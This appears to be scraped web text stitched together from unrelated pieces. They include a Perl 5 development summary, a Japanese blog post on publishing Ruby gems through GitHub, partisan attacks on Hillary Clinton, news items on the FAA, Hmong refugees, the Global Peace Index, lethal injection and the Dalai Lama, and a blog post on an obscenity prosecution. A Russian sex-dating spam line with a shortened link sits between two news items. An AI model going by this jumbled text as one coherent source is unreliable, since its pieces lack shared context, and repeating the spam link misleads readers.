Andy Dougherty suggested a pre-5.005 - compatible patch to " Configure " to get the 5.8.9 snapshot to compile on IRIX .
Alas , David Cantrell reported no joy .
http://xrl.us/bevzw
Elsewhere in the push to bring on 5.8.9 , Alexey Tourbin noticed that a recent change was causing tests to fail in " Term : : ReadLine : : Gnu " http://xrl.us/bev2c
Steven Schubiger had a " make test " fail with copious reports of " undefined symbol : __stack_chk_fail_local " .
No -one ventured a reason as to what or why things blew up .
try make distclean
http://xrl.us/bev2g
Yamashina
Hio wrote some POD in English which was fine , but the same POD in Japanese failed to produce correct text for link references .
No -one was able to provide any clues .
http://xrl.us/bev2p
Nicholas Clark made t/op / inc.t happy again , regarding the overflowing of an integer following an increment ( change # 33049 )
http://xrl.us/bevz2
Andreas König reported that the All Perl Changes ( APC ) repository now deals with 5.10 correctly , and all sorts of tarballs of assorted versions of Perl are available .
and there was much rejoicing http://xrl.us/bev2r
Regarding the BBC and " Apache : : DB " , Richard Foley wondered if there was a parallel with the problems he was having with other modules with Apache on 5.10 , such as " B:: TerseSize " .
http://xrl.us/bev2z
Abigail added some regression tests to t/cmd / for.t to ensure that " for reverse .. " does not break one day .
http://xrl.us/bev38
Jerry D. Hedden wrote a patch tp suppress imprecision warnings in t/op/64bitint.t. Applied by Nicholas .
http://xrl.us/bev4c
Jan Dubois pointed out that " socketpair ( ) " * is* available on Win32 , and has been for quite some time ( as in , prior to 5.8 ) .
only the documentation was buggy http://xrl.us/bev4e
About this summary
This summary was written by David Landgren .
In last week 's summary , I explained that Moritz Lenz was disappointed that a regexp would not recurse into an interpolated " qr / / " .
In actual fact it does , and Moritz was really wishing that it would n't .
Apologies to those confused by my confusion .
Aristotle Pagaltzis also noticed that my xrl.us short linkifier has no error checking , and it spewed garbage into last week 's summary .
the code dies screaming http://xrl.us/bevzq last week 's
http://xrl.us/bev3h
Weekly summaries are published on http://use.perl.org/ and posted on a mailing list , ( subscription : perl5-summary-subscribe@perl.org ) .
The archive is at http://dev.perl.org/perl5/list-summaries/.
Corrections and comments are welcome .
If you found this summary useful , please consider contributing to the Perl Foundation to help support the development of Perl .
Hispanics now account for more than 15 % of the U.S. population , and their surge is largely the result of births among people already in the country , according to new Census Bureau data .
In an annual report , the Census said there are 45.5 million Hispanics in the U.S. , up from 35.7 million in 2000 , when they made up 12.6 % of the population .
It said growth among Hispanics was responsible for half of the U.S. population gains between 2000 and 2007 .
In ...
最近一部で話題沸騰の github。github は Rails で作られたアプリケーションでは、自分が知りうる限り一番の完成度と使いやすさを誇るんじゃないか、と思っています。
ソースコードツリーの見やすさ、( g ) zipでくれ機能、各種 git の情報へのアクセスしやすさ、最初に git レポジトリを作ったとき表示されるチュートリアルと云った基本的なことはもちろんですが、オープンソースプロジェクト・コミュニティを加速させるであろう、分散レポジトリを利用した様々な機能がすばらしいですね。
誰かが公開してるレポジトリを fork ボタン一つで自分のレポジトリにクローンし、いろいろ変更を加え、大本に取り込んで欲しいなぁ、と思ったら pull request。大本のコミッタは気に入れば pull で取り込めばよいし、もし気に入らなかったとしても、変更者がそのフォークしたレポジトリを削除しない限り、完全なソースが存在し続けます。それを気に入った第三者はそちらを使うのもよし、参考にするもよし。
また git のフック機能を利用した数々の機能。たとえば edit 画面からコミット時、指定した URL に JSON のデータを送 るPost - Receive Hooks 機能( Web Hooks と呼ばれてるらしいです。先ほど知りました ) 。
そして Rubyist にはうれしい、gem を自動でサーバサイドで作成してリリースしてくれる機能があったりします。
この機能は最近の rubygems に実装された、大本のソー スURL を追加できる機能を利用しています。
$ sudo gem install rubygems - update $ sudo gem update -- system $ gem sources -a http://gems.github.com
することにより、github をソース元に追加できます。rubyforge では結構アップロードが面倒でしたが、github では . gemspec ファイルを用意して 、master に push するだけで gem が自動で作られ、公開されるのです 。
というわけで、これは相当面白いので実際に rascut を gems.github.com に公開してみました。その手順メモを。
github でプロジェクトを作る ふつうに作ります。rascut という名前で作ったので、ユーザ名 / rascut な名前空間が割り当てられます 。
http://github.com/hotchpotch/rascut/tree
rubyforge の svn から取り込む git - svn を使えば svn からのコンバートもばっちりです。 git-svn clone svn+ssh://secondlife@rubyforge.org /var/svn/hotchpotch/rascut/trunk rascut_svn
push する チュートリアルに沿って、適当なファイルを作り最初のコミット、push を行います。 # 思い出して書いてるのでひょっとしたらうまくいかないかも… mkdir rascut cd rascut git init touch .
gitignore git add .gitignore git commit -m ' first commit ' git remote add origin git@github.com :hotchpotch/rascut.git git push origin master その後 pull して svn な git を取り込み、push します。 git pull ../ rascut_svn git push これで github に公開されました 。
edit で RubyGem のチェックボックスにチェックを入れる
Web インターフェイスから行います 。
gemspec ファイルを作る hoe や cutagem の 0.0.8 >= ( いま は http://github.com/hotchpotch/cutagem/
にしかありませんが、そのうち id:cho45 が取り込んでくれるはず… ) を使うと、 rake debug_gem で . gemspec ファイルを作ることができます 。Gem :: Specification #to_ruby というメソッドがあるので、自分で gem を作っている人は、puts spec.to_ruby での出力を取り込むだけで OK です。 $ rake -- silent debug_gem > rascut.
gemspec $ git add rascut . gemspec $ gem build rascut . gemspec # build できるかチェック $ git push
完了！ これでちょっと待つと、gems.github.com からインストールされるようになるはずです。 require ' open - uri ' require ' rubygems ' gem_list = Marshal .load( open ( ' http://gems.github.com/Marshal.4.8 ' ) .read ) gem_list.
extend Enumerable p gem_list.map{| l | l.first}.grep ( / rascut / ) で、表示されれば完了です。後は $ sudo gem install hotchpotch - rascut と ユーザ名 - プロジェクト名 でうまくインストールされるはずです 。
1 . Your own campaign chairman , Terry McAuliffe , told MSNBC last night that you will lose to Obama in overall pledged delegates .
So the only way for you to win the nomination is by the superdelegates overruling the will of the people .
That will cause a civil war in the Democratic party ( I ’ll be helping to lead it ) .
It will likely cause blacks to leave the party , possibly forever .
It will disenfranchise the youth vote .
The Netroots will likely declare war on you .
A ) In what imaginary universe do you see the superdelegates risking a civil war for you ?
B ) How are you going to win an overwhelming majority of the remaining superdelegates , something you need in order to overrule the vote of the people , when the overwhelming majority of them are endorsing Obama ?
C )
Why are you willing to accept a civil war in the Democrat party in order to win the nomination ?
Does n’t that make you a traitor to your party ?
2 ) The DNC has said that this drawn out nomination is hurting their fundraising and limiting the number of ads they can run against John McCain .
You ca n’t win , and by drawing out the nomination , you ’re hurting the DNC ’s efforts against McCain .
Why does that not make you a traitor ?
3 ) A congressional candidate and a senate candidate have both told us that your name on the ballot in the fall will be an immediate 5 to 8 point penalty in the polls for their races .
This is because you are so hated by the right that your name on the ballot will inspire every lunatic to vote , and they will vote a straight party ticket , hurting every Democrat running .
Explain why we should n’t care that your nomination will devastate Democratic races across the country ?
Then explain why this does n’t make you a traitor ?
4 ) A congressional candidate and a senate candidate have both told us that the drawn out nomination is hurting their fundraising , as donors focus more on the presidential election , but also as some major donors are not willing to spend money on the general if your name is on the ballot ( because your name on the ballot will doom Democratic races in more conservative states ) .
You ca n’t win , and you ’re hurting Democratic fundraising across the country .
Why does n’t this make you a traitor to your own party ?
5 ) Groups like EMILY ’s List , AFSCME , and the American Federation of Teachers are still wasting large sums of money on independent expenditures to support your doomed candidacy .
That money could be better spent on candidates who actually have a chance of winning , rather than a candidate who has already lost .
You are literally taking money away from campaigns that need it .
Why does this not make you – and EMILY ’s List , AFSCME and the AFT – traitors to your own party ?
6 ) Because you ’re insisting on staying in a race that you ’ve already lost , Obama is forced to spend money and time dealing with you , rather than dealing with John McCain .
You are literally helping John McCain in this race .
Why does that not make you a traitor to your party ?
7 ) An increasing number of Democrats – Democrats who once liked and defended both you and your husband – now hate you , and are saying that the Republicans may have been right in everything they ’ve ever said about you .
Why are you willing to destroy your credibility and reputation in the Democratic party for a race that you ’ve already lost ?
Once Hillary answers those questions , then we ’ll talk .
Up to this point , the only solid casting news we ’ve had concerning the upcoming GI Joe film is that Sienna Miller apparently has snagged a role ( as The Baroness ? ) much to the displeasure of many fans .
But this news could lighten up their day .
According to our friends over at Slashfilm , GI Joe has cast the fan favorite character of Snake Eyes .
None other than Darth Maul himself , Ray Park .
I have just confirmed that Star Wars Episode 1 star Ray Park has been cast as Snake Eyes in Stephen Sommer ’s big screen live - action adaptation of GI Joe .
Snake Eyes is one of the original members of the GI Joe series .
Hasbro has released over 30 figures of the character since his debut in 1982 .
Not much is known about the ninja master ’s real identity , as it has remained classified throughout the series .
Not bad news … as long as he keeps the mask on and does n’t have to actually act .
Ray was also Toad in the first X - Men movie , and was also the Headless Horseman in Sleepy Hollow .
I had a chance to meet and hang out just a little with Ray at Comic Con this year at a couple of parties and he was very cool to me ( although word has it he fell far out of favor with folks at Star Wars ) .
But as cool as he is , he ’s not an actor … he ’s a stuntman , and a damned good one … which should be totally fine for a role like Snake Eyes .
Silent , masked , and doing insanely cool looking fight moves .
That ’s an order Ray Park can fill no problem .
Still waiting to hear who is officially going to be Duke , or Cobra Commander , or Destro … but this is decent news .
Some Dating Back Nine Years
Back in April , when FAA Acting Administrator Robert Sturgell ( right ) was facing lawmakers to answer for the missed FAA inspections at Southwest Airlines , he was asked by Senator Patty Murray of Washington state if there were any other airlines overdue for inspections .
Sturgell answered that he was n't aware of any at the time , but promised he'd look into it .
A few days later , he responded in a letter .
The Wall Street Journal reports it has reviewed Sturgell 's response , which admitted the FAA has failed to perform more than 100 recommended safety reviews at major airlines , some of which were due as long as nine years ago .
The thorough , five - year reviews of the airlines ' own safety systems were made mandatory in 2007 .
The goal of the reviews -- which the Journal says cover dozens of aspects ranging from flight - crew training to deicing programs -- is to ensure that airlines have the right systems in place to identify potential hazards and deal appropriately with any they find .
While the missed reviews do n't necessarily mean safety problems exist , Murray observed the Southwest case demonstrates the inspections matter .
" They are one of the best indicators of whether an airline has its act together when it comes to maintenance and safety compliance , " she said .
" Clearly , the FAA needs to bring more focus and leadership to meeting its own self - imposed deadlines . "
The FAA has been working to reduce costs through the agency 's Air Transportation Oversight System , or ATOS , which relies more on airline - provided data to monitor safety and maintenance procedures , and less on physical inspections .
The five - year reviews are one measure to ensure accountability in the data the industry reports voluntarily .
The Professional Aviation Safety Specialists , the union which represents most FAA inspectors , has been fighting the move to fewer inspectors and more reliance on industry self - reporting .
Union President Tom Brantley says ATOS is being misapplied .
" Rather than use ATOS as a tool to enhance its inspectors ' ability to perform industry oversight , the FAA has instead allowed ATOS to be used as a way to shift the burden of oversight from the agency to the industry itself , " Brantly said .
In his letter to Senator Murray disclosing the missed inspections , Sturgell acknowledged " inadequate resources " may have played a role .
NY Times : Obama speech on race fuels Easter sermons RAW STORY
Published : Saturday March 22 , 2008
|
Print This Email This Senator Barack Obama 's speech on race is fueling Easter sermons , according to an article in Sunday 's New York Times .
" This Easter Sunday , the holiest day of the Christian calendar , many pastors will start their sermons about the Resurrection of Jesus and weave in a pointed message about racism and bigotry , and the need to rise above them , " Laurie Goodstein and Neela Banerjee write for the Sunday Times .
" Some pastors began to rethink their sermons on Tuesday , when Sen. Barack Obama , D - Ill. , gave a speech about race , seeking to calm a furor that had erupted over explosive excerpts of sermons by his pastor , the Rev. Jeremiah A. Wright Jr. "
Some pastors tell the paper that " they felt compelled to talk about it , " because " [t ] heir congregants were writing and e-mailing them :
Some wanted to share their emotional reactions to Obama 's speech ; others asked how Wright , the minister , could utter such inflammatory things from the pulpit . "
However , the paper notes , other " ministers interviewed over the last several days said they would wait until after Easter to preach on it , because Easter and headlines do not mix .
But others said there was no better moment than Easter , when sanctuaries swelled with their biggest crowds of the year , and redemption was the dominant theme . "
" Many ministers said they would preach without explicitly mentioning Obama because they wanted to avoid alienating politically diverse congregations , " the article continues .
" They are also aware that some churches accused of making political endorsements have seen their tax - exempt status investigated by the Internal Revenue Service . "
FULL NEW YORK TIMES ARTICLE CAN BE READ AT THIS LINK
By all accounts , Vang Pao did not lose confidence during those difficult days .
“ Honor with one another , sympathy for one another , faith for one another , that ’s how we survived , ” he told me .
His American counterparts felt the same .
“ This guy was like a brother , ” said Devlin , the C.I.A. station chief , who worked with Vang Pao from 1967 to 1970 .
“ He was an extremely good leader .
He was worshiped by his troops .
We all admired him .
Respected him .
Liked him . ”
The C.I.A. and Vang Pao had an understanding about what would happen if the war went badly .
“ I had been told when I went out there to tell the Hmong we ’ll back them to the end , and if we have to pull out , we ’ll pull them out too , ” Devlin told me .
But that was not how things worked out .
The end came 33 years ago this week , in May 1975 .
It was a disaster .
Saigon had fallen ; the final rout of American military and intelligence officers from the war zones of Southeast Asia was nearly complete .
The C.I.A. ’s last outpost in Laos was its mountain air base at Long Tieng , the hub of the paramilitary operation .
Tens of thousands of Hmong gathered at the primitive airstrip , looking for planes .
Very few came , for there was no coherent evacuation plan after 15 years of secret missions .
As Dan Arnold , the last C.I.A. station chief in Laos , later recounted , authorization for an airlift had to come from Washington .
In his words , the request met “ delays at the highest political levels . ”
The evacuation was abandoned after a chaotic race against time .
“ Of course , most of the Hmong wanted to fly along with me to Thailand , but they could n’t because we only had enough aircraft to lift the officers and family members , ” Vang Pao said .
At least 50,000 Hmong , including many fighters and their families , were left behind in and around Long Tieng even as Vang Pao and his C.I.A. case officer flew to safety .
Thousands were killed by the victorious Communists , according to survivors .
Tens of thousands fled into the jungle and wound up as refugees in Thailand ; many became boat people , cold - war flotsam , forsaken .
Vaughn Vang , now a 50 - year - old school counselor in Green Bay , Wis. , and chairman of the Lao Human Rights Council , an organization seeking to bring attention to the plight of the jungle Hmong , became a teenage refugee when Laos fell to the Communists .
“ I ran through the jungle for two years , ” he said .
“ We were 260 when we left , and 39 of us made it out to Thailand . ”
The luckiest of the refugees made their way to the United States .
Their traditions were hunting and gathering ; they had been slash - and - burn farmers who cultivated opium as a cash crop , animists who believed in the spirit world .
They were not well suited for life in Sacramento .
Today more than 200,000 Hmong live in the United States , mostly in California , Wisconsin and Minnesota .
More than half are under 18 .
While many of the second and third generation are adapting to life in America , overall a quarter or more of the Hmong live in poverty and speak little English , if any .
Over the years , Vang Pao and the other Hmong leaders in the United States have by and large sustained themselves by raising money  raising it by raising hope that someday the Hmong would go back to their land .
During the cold - war years , he gave stirring speeches about liberating Laos .
The promise proved empty .
Unlike , say , Miami ’s Cubans , the Hmong have no real hope of return .
Their survival has depended far more on social services and welfare agencies than on the political dreams of their aging patriarchs .
“ Their way of life has been destroyed , ” Dick Holm , a C.I.A. officer who served in Laos , wrote in a memoir .
“ They can never return . ” The United States , in his view , “ failed to assume the moral responsibility that we owed to those who worked so closely with us during those tumultuous years . ”
His colleague , Larry Devlin , said , “ We let the Hmong down terribly . ”
Image Vang Pao , at the Pa Dong base in Laos in 1961 .
Credit ...
John Dominis / Time Life Pictures / Getty Images
Thousands of Hmong survive today as refugees in dismal camps in Thailand .
Perhaps 1,000 are still on the run in the jungles of Laos itself .
Human rights groups , filmmakers and journalists have documented their plight .
Though the jungle Hmong are believed to have staged occasional hit - and - run attacks in the past , Amnesty International reported last year that “ the jungle - dwellers ’ military capacity is all but depleted decades after some Hmong fought in the C.I.A. - funded ‘ secret army ’ in Laos during the Vietnam War . ”
The jungle Hmong say they are being slaughtered by Lao military units who hunt them with automatic weapons and rocket - propelled grenades , exacting blood vengeance for the wars of the 1960s and ’ 70s .
Veterans  American and Hmong  of the secret missions in Laos see this struggle as the last battle of the Vietnam War .
“ The Communists accuse the Hmong of bringing American bombs to Laos , ” Vaughn Vang , the Lao human rights advocate , told me .
“ This country used the Hmong .
They trained them how to fight .
Now the Hmong are dying because they were allies of the United States . ”
Republicans mostly act like Clinton does n’t exist — an unusual turn of events considering her run of big - state victories .
GOP gives Clinton the silent treatment
Hillary Clinton ’s decisive Pennsylvania primary win last week may have reinvigorated her campaign , but you would n’t know it from listening to the Republican party .
The National Republican Congressional Committee has purchased $ 500,000 in anti-Barack Obama ads for use in two upcoming special House elections .
The Republican National Committee is flooding reporters with anti-Obama emails .
Presumptive nominee John McCain and GOP surrogates have seized on new remarks by Obama ’s controversial former pastor .
Advertisement
From top to bottom , from McCain down to the youthful campaign and party staffers who work nearly around the clock to get him elected , the working assumption seems to be that the Democratic contest is over and Obama has won .
Even when Clinton attacks McCain , President Bush or GOP policies , the response is either outright silence or snarky , dismissive ridicule about a failed campaign barely relevant enough to merit a response .
“ With ads like that , it ’s more likely the call at 3 a.m. is ‘ Senator , you just lost another superdelegate , ’ ” quipped McCain adviser Steve Schmidt earlier this month when Clinton aired a version of her “ 3 a.m. ” ad attacking McCain on the economy .
In one revealing glimpse into Republican thinking , when McCain quickly hit back with an ad of his own parroting the genre , he incorporated Barack Obama ’s name into the response and spent little money airing it .
Clinton , it seems , has been erased from the picture , Soviet - style .
Republicans mostly act like she does n’t exist — an unusual turn of events considering her run of big - state victories and the fact that not so long ago Republican campaign plans were predicated on the idea of Clinton as the Democratic nominee .
Indeed , her recent success has only increased the volume and ferocity of the attacks — not on her , but on Obama .
After her Pennsylvania win last week , the RNC did not send a single e-mail focused on Clinton through Monday .
At the same time , the committee blasted out 18 that attacked Obama .
When McCain ’s campaign last week launched a new morning e-mail to reporters detailing the day ’s schedule and drawing attention to preferred stories , they signaled the candidate who has their undivided attention .
Included each day along with critical articles about Obama is the “ Audacity Watch , ” the smart - alecky rubric under which they take the Illinois senator to task for some public comment or policy position .
There has yet to be any mention of the senator from New York .
Nor did Clinton ’s name surface other than in passing in a press release dressed up as a “ memo ” that was sent out last week by McCain campaign manager Rick Davis .
While it ticked off reams of Pennsylvania exit poll data highlighting Obama ’s potential vulnerabilities , there was again no discussion of potential Clinton weaknesses .
“ Even though Hillary Clinton won this primary , Barack Obama is seen as the front runner among Pennsylvania Democrats and is perceived to be the candidate most likely to win the Democratic Party ’s nomination , ” Davis explained .
McCain himself has become more aggressive in hitting Obama .
On ABC ’s “ This Week ” last Sunday , he raised , unprompted , the Democrat ’s views on capital gains taxes and his ties to a member of the radical Weather Underground group .
In a conference call with conservative bloggers Friday , McCain responded to a question about words of support a Hamas political adviser had bestowed on Obama by saying it ’s “ very clear who Hamas wants to be the next president of the United States . ”
He then noted leftist Nicaraguan President Daniel Ortega ’s support for Obama , as well .
Sunday , McCain ended his reluctance to go after the Illinois senator over Obama ’s controversial pastor by bringing up two new statements made by Rev. Jeremiah Wright .
On Clinton , McCain has said next to nothing of late , including her only in broad critiques that are always twinned with shots at Obama .
“ [ Obama ] is still is clearly the front - runner for the Democratic nomination , ” notes GOP strategist Brian Jones , a former top aide on McCain ’s campaign .
“ The math is still clearly in his favor , he leads in fundraising and has the energy in the party behind him .
So it makes sense . ”
The Republican attacks mirror private disdain for Obama that , while still far from Clinton hatred at its zenith , is rapidly intensifying .
The view among McCain aides and other Republicans is that Obama has gotten a free ride from the press despite what they see as a record of little substantive accomplishment .
Despite evidence to the contrary , McCain ’s campaign would n’t concede that they are concentrating on Obama .
“ Sometimes we engage him and sometimes we engage her , ” said communications director Jill Hazelbaker .
“ There is not a distinct strategy to engage Obama . ”
RNC communications director Danny Diaz noted that Obama has attracted more scrutiny because he has been more aggressive in his attacks .
“ He engages Sen . McCain with much more frequency and has made Sen.
McCain ’s record part of his standard stump speech , ” Diaz said .
The GOP focus on Obama also has a strategic component .
His image is not nearly as pronounced as that of the former first lady among most Americans , which necessitates further definition .
“ He has a very soft impression , so they ’re using this time to define him , ” observed Kevin Madden , a veteran Republican operative who recently served as Mitt Romney ’s chief spokesman .
More notably , the view of Obama among Republicans has changed .
After much trembling about the threat he could pose , the Republican consensus has dramatically shifted : many are now enthused about the prospect of taking on a candidate they see as fatally flawed .
“ The apparatus will be ready for both , but the Barack Obama that a lot of Republican strategists looked at four or five months ago was a lot more formidable than the one stumbling through the last few months , ” observed Madden .
The emergence ( and re-emergence ) of Obama ’s pastor , the candidate ’s gaffe about small - town America and his seemingly hardening demographic weaknesses have convinced many in the GOP that he would provide the most vivid opportunities for contrast and caricature .
“ Clearly there ’s a sense that she would be a tougher general election candidate , ” said one Republican strategist .
“ So why do we want to acknowledge her and give her more credibility ?
Attacking her sends a message to the Democratic electorate .
If she ’s not the person you want to engage , why would you do that ? ”
To some degree , Clinton is now seen in conservative circles as a temporary ally who ought not be thrown off stride .
“ She ’s our best surrogate , ” joked Barbara Comstock , a former RNC research director and GOP strategist .
But Comstock , like some other Republicans , also believes it ’s risky to give Clinton a free pass .
“ Given how volatile this campaign is , we should highlight that both are left of center , ” she said .
“ She and Obama are soul brother and sister on philosophy .
And right now you have to fight against the ideology of both of them . ”
Noting the photos that surfaced of Bill and Hillary Clinton with Tony Rezko , the image of Jeremiah Wright with Bill Clinton in the White House and the fact that the former president commuted the sentences of some members of the Weather Underground , Comstock said the Obama vulnerabilities could be paired with Clinton .
As for the Clinton campaign , when asked about the Republican silence toward the New York senator , the campaign returned the favor : A spokesman declined to respond for the record .
The results this year show that the level of global peacefulness deteriorated , with the average country score falling by 0.34 per cent .
This is the ninth deterioration in peacefulness in the last twelve years , with 81 countries improving , and 80 recording deteriorations over the past year .
The 2020 GPI reveals a world in which the conflicts and crises that emerged in the past decade have begun to abate , only to be replaced with a new wave of tension and uncertainty as a result of the COVID - 19 pandemic .
Iceland remains the most peaceful country in the world , a position it has held since 2008 .
It is joined at the top of the index by New Zealand , Austria , Portugal , and Denmark .
Afghanistan is the least peaceful country in the world for the second year in a row , followed by Syria , Iraq , South Sudan and Yemen .
All , except Yemen , have been ranked amongst the five least peaceful since at least 2015 .
Only two of the nine regions in the world became more peaceful over the past year .
The greatest improvement occurred in the Russia and Eurasia region , followed by North America .
North America was the only region to record improvements across all three domains , while Russia and Eurasia recorded improvements in Ongoing Conflict and Safety and Security , but a deterioration on the Militarisation domain .
The world is now considerably less peaceful than it was at the inception of the index .
Since 2008 the average level of country peacefulness has deteriorated 3.76 per cent .
There have been year on year deteriorations in peacefulness for nine of the last 12 years .
The fall in peacefulness over the past decade was caused by a wide range of factors , including increased terrorist activity , the intensification of conflicts in the Middle East , rising regional tensions in Eastern Europe and Northeast Asia , and increasing numbers of refugees and heightened political tensions in Europe and the US .
Executions by lethal injection have been on hold for months
The US Supreme Court has rejected a challenge to the use of lethal injections to execute prisoners .
The court rejected by 7 - 2 the case made by two death row inmates in the state of Kentucky .
They sued the state in 2004 , saying the commonly used combination of three chemical injections violated the US constitution 's ban on cruel punishment .
Executions nationwide have been on hold since September .
Virginia immediately said it was lifting its moratorium .
In a separate case , the Supreme Court is considering whether the death penalty can be applied for child rape .
Botched executions During an execution by lethal injection , the inmate is given three drugs - a sedative , another that paralyses all muscles except the heart and a final drug which stops the heart , causing death .
States began using the three - drug method in 1978 as an alternative to historic methods of execution such as electrocution .
However , in recent years there have been botched lethal injection executions in Florida and California , in which inmates took up to 30 minutes to die .
A 2005 study also sparked controversy by suggesting the amount of sedation given might not be enough to stop the inmate feeling the painful effects of the other drugs - but would prevent him crying out .
LETHAL INJECTIONS
Sodium pentothal - anaesthetic Pancuronium bromide - paralyses entire muscle system Potassium chloride - stops the heart Chief Justice John Roberts said the petitioners had " not carried their burden of showing that the risk of pain from maladministration of a concededly humane lethal injection protocol , and the failure to adopt untried and untested alternatives , constitute cruel and unusual punishment " .
Justices Ruth Bader Ginsburg and David Souter dissented .
Justice John Paul Stevens , although agreeing with the outcome , said the ruling would not bring an end to the lethal injection debate .
" I am now convinced that this case will generate debate not only about the constitutionality of the three - drug protocol ... but also about the justification for the death penalty itself . "
A total of 42 people were executed last year before the suspension .
About 3,300 remain on death row nationwide .
A spokesman for Timothy Kaine , governor of Virginia , said the state would now proceed with executions as planned .
Eighth amendment The Supreme Court was ruling on the case of two Kentucky death row inmates - Ralph Baze and Thomas Clyde Bowling Jr. In 2004 , Baze and Bowling - who had both been convicted of murder and sentenced to death - argued that lethal injections administered in Kentucky amounted to cruel and unusual punishment , violating the Eighth Amendment of the US Constitution .
That amendment is also being cited in a separate case in which the Supreme Court heard arguments on Wednesday , over whether the death penalty should be applied to a man found guilty of raping a child .
Patrick Kennedy was sentenced to death under Louisiana law for raping his 8 - year - old stepdaughter .
His lawyer , Jeffrey L Fisher , argues that it would be a cruel and unusual punishment to execute his client for rape , since the death penalty is usually reserved for murder .
Five states , including Louisiana , permit executions for child rape .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Любишь Секс , но его всегда мало .
Найти новых секс партнеров теперь легко : Регистрируйся и ищи партера на своем районе или по интересам , все анонимно и бесплатно , просто попробуй — bit.do/xznakom
The Dalai Lama denies playing a political role in Tibet The Dalai Lama has been made an honorary citizen of Paris , as anti-French protests continue in China .
Paris city council voted to bestow the symbolic title on the Tibetan spiritual leader , whom Mayor Bertrand Delanoe called " a champion of peace " .
The move was opposed by the party of President Nicolas Sarkozy , who has been trying to ease tense ties with Beijing .
Chinese protesters have been picketing French supermarket Carrefour , accusing it of supporting the Dalai Lama .
Beijing accuses the Dalai Lama of inciting unrest in Tibet - claims he has denied .
Chinese officials are launching a two - month " patriotic education " in Tibet , in which Communist Party officials and local people will gather to denounce the spiritual leader .
Paris wants to show its support for the people of Tibet
Paris Mayor Bertrand Delanoe
China seeks to ' educate ' Tibetans
The Dalai Lama , who lives in exile in India , insists he has no political role and played no part in the protests by Tibetan Buddhist monks that erupted into rioting in the main city Lhasa last month .
But he condemned the Chinese crackdown that followed , and accused Beijing of committing " cultural genocide " in Tibet .
Tibetan sympathisers and human rights activists have since used the worldwide tour of the Olympic torch to protest against Beijing 's hosting of the Olympic Games this August .
Mayor Delanoe said in honouring the Dalai Lama , Paris wanted " to show its support for the people of Tibet who are defending their most basic right to dignity , freedom and simply life " .
' Outstanding courage '
The gesture came as France 's president expressed sympathy for a disabled Chinese athlete who was jostled by a pro-Tibetan activist as she held the Olympic torch in Paris .
Christian Poncelet of the French Senate delivered the letter to Ms Jin
In a letter to 27 - year - old Paralympian fencer Jin Jing , Nicolas Sarkozy told her she had shown " outstanding courage " in the face of the assault .
" I want to assure you that the incidents staged by a few people on this sad day do n't reflect the feelings of my fellow countrymen for the Chinese people , " Mr Sarkozy wrote .
The Paris incident was the catalyst that sparked an outburst of anti-French protests in China .
Online activists there have spent weeks urging a boycott of French goods .
Over the weekend thousands of people demonstrated outside Carrefour stores in China .
The company has issued a statement denying that it supports the Dalai Lama , and declaring support for the Beijing Olympics .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Those brave souls at the Department of Justice are at it again , protecting freedom and democracy pissing on the Constitution , in violation of their oath of office .
XBiz reports that John Stagliano and Evil Angel Productions are the latest targets of the Bush administration ’s faith - based censorship task force and its lead toadie , Brent Ward .
Stagliano and his related companies were charged with “ three counts of using a facility of interstate commerce to sell and distribute DVDs containing obscene films together with a movie trailer in violation ; two counts of using a common carrier for the conveyance or delivery of DVDs containing obscene films in interstate commerce ; one count of engaging in the business of selling or transferring an obscene film and a movie trailer ; one count of using an interactive computer service to display an obscene movie trailer in a manner available to a person under 18 years of age ; and one count seeking forfeiture of certain assets of the defendants . ” ( source )
The indictment reported on here apparently is for films involving squirting , anal squirting , and / or enemas .
A copy is available here .
I will agree that films involving squirting milk up a girl ’s ass , and then watching it spray out again are on the far side of strange - world .
Nevertheless , is this something that you want your government pursuing ?
Do you really think that your government should be spending its resources trying to put Stagliano in prison ?
Who is the greater threat to us all ?
Stagliano or Brent Ward ?
Ward is a repressed Utah fascist who came to power during the Bush administration ’s push to make the entire government a faith - based initiative .
After years of languishing in frustration in Utah , Ward was given a position of power at the Department of Justice — heading up the DOJ ’s obscenity task force .
When prosecutors laughed at him for trying to divert government resources to putting people in jail for selling “ dirty movies , ” he got pissed — and did his best to remove prosecutors who did n’t follow his faith - based anti-First Amendment crusade .
( source ) .
Remember the U.S. Attorneys scandal from a few months ago ?
At least two of the U.S. Attorneys lost their jobs because they thought that pursuing crime was more important than trying to criminalize First Amendment protected expression .
Adult obscenity prosecutions are notoriously difficult to win , since prosecutors must show that materials involving and used by consenting adults have violated local “ community standards . ”
In the post - 9/11 era , law enforcement experts have questioned whether a focus on federal obscenity cases makes sense , given the massive resources diverted to counterterrorism and the demands of other criminal priorities like gun violence , identity theft and the proliferation via the Internet of sex crimes against children .
“ With everything else going on , should they really have FBI agents and prosecutors devoted to sitting around watching dirty movies ? ” said a senior law enforcement official who attended a national conference on adult obscenity orchestrated by the Gonzales Justice Department in October 2006 .
“ We ’re not the policymakers , ” he said .
“ But I guarantee you wo n’t find any office in any major metropolitan area that would seriously consider this a priority . ” ( source )
Well , it looks like someone threw Ward a bone .
That bone is Mr. Stagliano — but Mr. Stagliano stands in as a proxy for all of our freedom , whether we like milk enema movies or not .
I do not believe that obscenity can truly and honestly be Constitutionally prohibited .
See Two Girls , One Cup – Practical Obscenity Law .
Nevertheless , for as long as we have zealots serving as prosecutors , and they seek to pander to the worst people in society , there will be obscenity prosecutions .
I believe that even the worst content ( as long as that content is of consenting adults ) should be constitutionally protected .
Nevertheless , the reality is that the social conservatives have funded this modern - day thought police , this obscenity task force that exists for one purpose — to watch dirty movies and put people in prison for making and selling them .
Somewhere , right now , there is a Ned Flanders type with deep feelings of repressed homosexuality watching a film with some church - chat looking woman who spent three years in law school with her face buried in Andrea Dworkin law review articles , and the two of them are deciding that the person who made a certain movie needs to be in prison .
In the United States of America …
Your tax dollars are spent on efforts to put adults in prison who filmed other consenting adults and sold the movie to other consenting adults .
So much for the land of the free .
The only “ crime ” that Stagliano committed was dissemination of speech that challenges the morality that Brent Ward has decided we should all live by .
If you do n’t like milk - enema films , then exercise your right to not watch it .
But , should n’t we all , as free Americans , have the right to make that decision for ourselves ?
Nobody forced the girls to be in the video .
Nobody forced the guy to make the video .
Nobody forced anyone to fork over their hard earned cash to buy the video .
That ’s what freedom is .
You make your own choices — for ill or for good .
The government has no right to take a hand in that decision .
